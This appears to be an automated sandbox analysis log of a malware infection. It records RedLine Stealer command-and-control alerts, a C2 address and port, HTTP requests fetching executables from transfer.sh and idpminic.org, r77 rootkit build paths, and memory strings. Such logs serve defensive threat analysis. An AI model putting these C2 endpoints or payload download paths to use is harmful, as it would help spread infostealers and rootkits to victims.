Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49984 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49992 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50003 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50006 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50008 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50011 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50014 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50019 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50028 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50031 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50041 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50043 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50049 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50058 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50073 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50082 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50085 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50088 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50095 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50103 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50106 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50109 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50111 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50114 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50119 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50121 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50124 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50129 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50135 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50139 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50160 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50163 version: TLS 1.2

Source:	Binary string: GoogleUpdate_unsigned.pdb source: GoogleUpdate.exe, 00000025.00000000.393756713.0000000000E41000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\Release\r77-x86.pdb source: powershell.exe, 0000003D.00000002.578889899.000001CD149E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.633336710.000001CD249D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.630160818.000001CD2483C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\InstallStager\obj\Release\InstallStager.pdb source: brave.exe, 00000006.00000002.458469655.000001AC13EF2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\InstallStager\obj\Release\InstallStager.pdb- source: brave.exe, 00000006.00000002.458469655.000001AC13EF2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: powershell.exe, 0000003D.00000002.635145721.000001CD24AB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.633336710.000001CD249D2000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000041.00000000.537508242.000000014001C000.00000040.00000001.00020000.00000000.sdmp, dllhost.exe, 00000041.00000000.535294108.000000014001C000.00000040.00000001.00020000.00000000.sdmp, winlogon.exe, 00000044.00000000.554210864.00000254B29D0000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\Release\InstallService32.pdb source: powershell.exe, 0000003D.00000002.633336710.000001CD249D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.630160818.000001CD2483C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\x64\Release\Install.pdb source: brave.exe, 00000006.00000002.458469655.000001AC13EF2000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000039.00000000.455311066.00007FF670D4D000.00000002.00000001.01000000.00000000.sdmp, dialer.exe, 00000039.00000002.461723333.00007FF670D4D000.00000002.00000001.01000000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\x64\Release\InstallService64.pdb source: powershell.exe, 0000003D.00000002.578889899.000001CD149E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.635145721.000001CD24AB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.633336710.000001CD249D2000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000041.00000000.533619282.0000000140000000.00000040.00000001.00020000.00000000.sdmp, dllhost.exe, 00000041.00000000.529862178.0000000140000000.00000040.00000001.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	6_2_00007FF652B52530
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	6_2_00007FF652B52530
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	6_2_00007FF652B52530
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then mov qword ptr [rsp+28h], 0000000000000000h	6_2_00007FF652B52530
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	6_2_00007FF652B523A0
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	6_2_00007FF652B523A0
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then mov rax, qword ptr [rcx]	6_2_00007FF652B45530
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	6_2_00007FF652B52490
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	6_2_00007FF652B52490
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	6_2_00007FF652B52490
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	6_2_00007FF652B52490
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	6_2_00007FF652B52490
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then mov qword ptr [rsp+28h], 0000000000000000h	6_2_00007FF652B52490
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then sub rsp, 38h	6_2_00007FF652B4F1C0
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then sub rsp, 38h	6_2_00007FF652B481D0
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	6_2_00007FF652B522E0
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	6_2_00007FF652B522E0
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	6_2_00007FF652B522E0
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	6_2_00007FF652B522E0
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then sub rsp, 38h	6_2_00007FF652B4C000
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	6_2_00007FF652B48100
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 4x nop then sub esp, 1Ch	43_2_00416010

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2039616 ET TROJAN Win32/Agent.AETZ CnC Checkin 192.168.2.5:49715 -> 172.66.43.60:443
Source: Traffic	Snort IDS: 2850027 ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.5:49706 -> 45.10.55.124:47029
Source: Traffic	Snort IDS: 2850286 ETPRO TROJAN Redline Stealer TCP CnC Activity 192.168.2.5:49706 -> 45.10.55.124:47029
Source: Traffic	Snort IDS: 2850353 ETPRO MALWARE Redline Stealer TCP CnC - Id1Response 45.10.55.124:47029 -> 192.168.2.5:49706

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 45.10.55.124 ports 47029,0,2,4,7,9

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 45.10.55.124:47029

Source: global traffic	HTTP traffic detected: GET /get/frWBuE/123%20%282%29.exe HTTP/1.1Host: transfer.shConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /get/A4YbIY/1607293575.exe HTTP/1.1Host: transfer.sh
Source: global traffic	HTTP traffic detected: GET /aula/dmi1dfg7n.kjylug HTTP/1.1Host: www.idpminic.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aula/ofg7d45fsdfgg312.sfhg HTTP/1.1Host: www.idpminic.org
Source: global traffic	HTTP traffic detected: GET /aula/f429fjd4uf84u.sdfh HTTP/1.1Host: www.idpminic.org

Source: global traffic

TCP traffic: 192.168.2.5:49706 -> 45.10.55.124:47029

Source: vbc.exe, 00000002.00000002.527395179.0000000009DE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000003.438699600.000001AA455E5000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.478619739.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.487578505.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.511003595.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.536031214.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.434821755.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.548180665.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.490865222.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.450457536.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.476024763.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.526216549.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.459624370.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.463712562.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.466385494.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.462000222.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.545334289.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.540360749.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.452897537.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.495329979.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.529595020.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vbc.exe, 00000002.00000002.453478134.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.453382772.0000000006CD1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.453073739.0000000006C81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: vbc.exe, 00000002.00000002.453478134.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.453382772.0000000006CD1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.453073739.0000000006C81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: vbc.exe, 00000002.00000002.451663440.0000000006C0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://idpminic.org
Source: vbc.exe, 00000002.00000002.439078747.0000000005097000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.c/g
Source: powershell.exe, 0000003D.00000002.587396153.000001CD14D72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.630160818.000001CD2483C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: vbc.exe, 00000002.00000002.453478134.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.453382772.0000000006CD1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.453073739.0000000006C81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 0000003D.00000002.587396153.000001CD14D72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
